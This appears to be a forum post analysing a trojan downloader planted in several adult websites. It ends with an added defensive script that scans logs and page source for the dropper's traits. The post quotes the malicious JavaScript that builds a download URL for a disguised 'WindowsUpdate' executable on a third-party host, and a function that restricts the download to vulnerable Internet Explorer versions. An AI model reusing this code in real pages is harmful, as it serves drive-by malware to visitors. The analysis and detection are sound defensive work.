Yes, Cosis, you are right.
And pornno.com and snakesworld.com install the same Trojan.DownLoader version from rockyspornpalace.com.
The first downloaded file name is WindowsUpdate[random number].exe
Here is the JavaScript line which creates the URL:
burl="http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
beemk, snakesworld has it at the bottom of the page but above the </BODY> tag; pornno has it at the beginning of the Asians section, so I doubt the host can do it.
I do not think they are hackers of course, looks like they do it for money.
thurbs, you are right, here is the function from the snakesworld/pornno trojan downloader which decides whether to download the trojan or not:
function BadBrowser()
{
    // Not Internet Explorer
    if(navigator.appName!="Microsoft Internet Explorer")
        return 1;
    // Cookies disabled
    if(!navigator.cookieEnabled)
        return 1;
    // Not 32-bit Windows
    if(navigator.platform!="Win32")
        return 1;
    // Neither IE 5.5 nor IE 6.x
    if(navigator.userAgent.indexOf("MSIE 5.5")==-1 && navigator.userAgent.indexOf("MSIE 6.")==-1)
        return 1;
    // The msip=6x cookie is already present
    if(document.cookie.indexOf("msip=6x")>-1)
        return 1;
}
Snake, if your site IP is not 64.158.30.220 check your nameserver.
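Added example, not part of the original post: a small checker for site owners and proxy admins that flags logged URLs matching the generated WindowsUpdate[random].exe name and page source carrying the script markers quoted above. The function names, the log line layout and the example.test hosts are assumptions made for this sketch.

```javascript
// Added example, not code from the post. Names and log layout are hypothetical.

// The script builds "WindowsUpdate" + (Math.random()+" ").substr(2,5) + ".exe".
// substr(2,5) is normally five digits, but a short value such as "0.5 "
// gives "5 " (digit plus space), which appears as %20 or + in a logged URL.
const DROP_NAME = /\/WindowsUpdate(?:\d|%20|\+){1,5}\.exe(?:[?#]|$)/i;

// Strings from the quoted script that should never appear in a clean page.
const SOURCE_MARKERS = {
  randomExeUrl: /WindowsUpdate["']\s*\+\s*\(\s*Math\.random\(\)/,
  seenCookie: /msip=6x/,
  ieOnlyGate: /navigator\.appName\s*!=\s*["']Microsoft Internet Explorer["']/,
};

function matchesDropName(url) {
  return DROP_NAME.test(url);
}

// Return the log lines whose URL field matches the generated file name.
function scanProxyLog(lines) {
  return lines.filter((line) => {
    const url = line.split(/\s+/).find((f) => /^https?:\/\//i.test(f));
    return url !== undefined && matchesDropName(url);
  });
}

// Return the names of the markers found in a page's HTML/JS source.
function scanPageSource(html) {
  return Object.keys(SOURCE_MARKERS).filter((k) => SOURCE_MARKERS[k].test(html));
}

// Constructed sample data (not real traffic).
const SAMPLE_LOG = [
  "2004-09-01T10:00:01 10.0.0.5 GET http://ads.example.test/ad/banners/1/2/WindowsUpdate48213.exe 200",
  "2004-09-01T10:00:02 10.0.0.5 GET http://ads.example.test/ad/banners/1/2/WindowsUpdate5%20.exe 200",
  "2004-09-01T10:00:03 10.0.0.7 GET http://update.example.test/WindowsUpdateAgent.exe 200",
  "2004-09-01T10:00:04 10.0.0.7 GET http://www.example.test/index.html 200",
];
const SAMPLE_PAGE =
  'burl="http://ads.example.test/x/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";' +
  'if(navigator.appName!="Microsoft Internet Explorer") return 1;';

console.log(scanProxyLog(SAMPLE_LOG));
console.log(scanPageSource(SAMPLE_PAGE));
```

Run scanPageSource over your own templates and included files as well as the rendered page, since the script was found in different places on each site.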